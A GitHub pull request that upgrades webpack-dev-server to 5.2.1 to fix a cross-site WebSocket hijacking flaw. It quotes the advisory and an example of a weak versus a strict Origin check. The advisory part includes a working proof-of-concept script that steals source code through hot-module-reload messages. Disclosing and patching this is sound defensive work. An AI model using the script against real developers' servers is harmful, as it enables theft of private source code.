forked from MagentaHealth/Open-O
Closed
Labels: dependencies (Pull requests that update a dependency file), type: maintenance (Code refactoring, dependency updates, etc.)
Description
Dependency: webpack-dev-server
Current Version: 4.15.2
Target Version: 5.2.1
Reason: Security vulnerability
Breaking Changes
Summary
Source code may be stolen when you access a malicious web site with a non-Chromium-based browser.
Details
The Origin header is checked to prevent cross-site WebSocket hijacking, which was reported in https://github.com/advisories/GHSA-cf66-xwfp-gvc4.
But webpack-dev-server always allows Origin headers whose host is an IP address.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect to the WebSocket.
By using the same method described in [the article](https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages) linked from https://github.com/advisories/GHSA-cf66-xwfp-gvc4, the attacker gets the source code.
Related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that the checkHost function was only used for the Host header, to prevent DNS rebinding attacks, so this change itself is fine).
This vulnerability does not affect Chrome 94+ (and other Chromium-based browsers) users due to [the non-HTTPS private access blocking feature](https://developer.chrome.com/blog/private-network-access-update#chrome_94).
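To make the Origin check concrete, here is an added example (not webpack-dev-server's own code): a weak check that mirrors the IP-literal exception described above, beside a stricter one that treats IP literals like any other host. The allow-list format (a leading dot matching subdomains) and the host names used are assumptions for the example.

```javascript
// Added example, not webpack-dev-server's own code: two WebSocket Origin checks.
// The allow-list format (".example.com" also matches subdomains) is an assumption.

// Lowercased host from an Origin header value; null if the header is missing,
// is the opaque "null" origin, or does not parse as an http(s) URL.
function hostFromOrigin(originHeader) {
  if (typeof originHeader !== 'string') return null;
  try {
    const u = new URL(originHeader);
    if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
    // Node keeps the brackets on IPv6 hostnames ("[::1]"); drop them.
    return u.hostname.replace(/^\[|\]$/g, '').toLowerCase();
  } catch (e) {
    return null;
  }
}

// IPv4 dotted quad, or anything containing ':' (an IPv6 literal once brackets are gone).
function isIpLiteral(host) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.includes(':');
}

function matchesAllowedHosts(host, allowedHosts) {
  return (allowedHosts || []).some((entry) => {
    const e = entry.toLowerCase();
    if (e.startsWith('.')) return host === e.slice(1) || host.endsWith(e);
    return host === e;
  });
}

// Weak check modelling the advisory: an Origin whose host is an IP literal is
// always accepted, so a page served from http://203.0.113.5/ may open the
// dev-server WebSocket even though it is not on the allow list.
function originAllowedWeak(originHeader, allowedHosts) {
  const host = hostFromOrigin(originHeader);
  if (host === null) return false;
  if (isIpLiteral(host)) return true; // the IP-literal exception
  return matchesAllowedHosts(host, allowedHosts);
}

// Stricter check: the Origin host must equal the dev server's own host or be on
// the allow list; IP literals get no special treatment.
function originAllowedStrict(originHeader, serverHost, allowedHosts) {
  const host = hostFromOrigin(originHeader);
  if (host === null) return false;
  if (host === serverHost.toLowerCase()) return true;
  return matchesAllowedHosts(host, allowedHosts);
}
```

With the server host set to localhost and an empty allow list, the strict check rejects an Origin of http://203.0.113.5 that the weak check accepts, which is exactly the case the PoC below relies on.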
PoC
- Download [reproduction.zip](https://github.com/user-attachments/files/18418233/reproduction.zip) and extract it
- Run npm i
- Run npx webpack-dev-server
- Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
- Edit src/index.js in the extracted directory
- You can see the content of src/index.js
The script in the PoC site is:
    // Called by the hot-update chunk once it loads; dumps the module sources it carries.
    window.webpackHotUpdate = (...args) => {
      console.log(...args);
      for (const i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText;
        console.log(args[1][i]);
      }
    };
    let params = new URLSearchParams(window.location.search);
    let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
    let file = params.get('file');
    let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
    let wsPort = target.port;
    let currentHash = '';
    let currentHash2 = '';
    let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
    // Cross-origin connection to the dev server's HMR WebSocket.
    const ws = new WebSocket(wsTarget);
    ws.onmessage = event => {
      console.log(event.data);
      if (event.data.match('"type":"ok"')) {
        const s = document.createElement('script');
        s.src = `${target}${file}.${currentHash2}.hot-update.js`;
        document.body.appendChild(s);
      }
      // Track the last two compilation hashes announced over the socket.
      const r = event.data.match(/"([0-9a-f]{20})"/);
      if (r !== null) {
        currentHash2 = currentHash;
        currentHash = r[1];
        console.log(currentHash, currentHash2);
      }
    };
Impact
This vulnerability can result in source code being stolen from users who use a predictable port and a non-Chromium-based browser.
Testing
- Run the tests
- Try running the dev server
- Try smoke testing the application
Priority
Critical (Security fix)
Checklist
- I have reviewed the changelog for breaking changes
- I have identified all affected code areas
- I have a rollback plan if issues arise
Status: Done